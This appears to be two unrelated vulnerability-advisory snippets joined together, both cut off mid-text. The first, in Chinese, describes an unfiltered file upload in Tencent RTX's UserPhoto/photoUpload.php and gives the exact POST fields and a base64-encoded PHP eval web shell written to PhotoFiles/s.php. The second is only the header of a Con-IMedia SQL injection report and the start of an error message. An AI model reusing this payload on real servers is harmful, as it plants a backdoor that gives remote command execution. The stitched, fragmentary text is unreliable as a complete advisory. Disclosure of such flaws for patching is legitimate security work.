安装RTX后打开IP:8012网址   腾讯RTX存在UserPhoto/photoUpload.php任意文件上传漏洞     详细说明：   简单的一个post表单即可上传 $user_account = $_POST['user_account']; $file_name = $_POST["file_name"]; $file_data = $_POST["file_data"]; 无任何过滤 漏洞证明：   user_account=1000 file_name=s.php file_data=PD9waHAgZXZhbCgkX1BPU1Rbc2JdKT8+ file_data为base64_encode数据 post提交后UserPhoto目录下生成PhotoFiles/s.php 需要extension=php_mbstring.dll开启及php4 修复方案：   上传过滤     作...

标题: Con-IMedia SQL inj: vulnerable                        作者: nGa Sa Lu [ GaNgst3r ]                                             测试平台: Vista                                                                      程序语言 : php                                                                                                                            ================================================================  SQL Error Statement :     Warning: mysql_fetch_array():...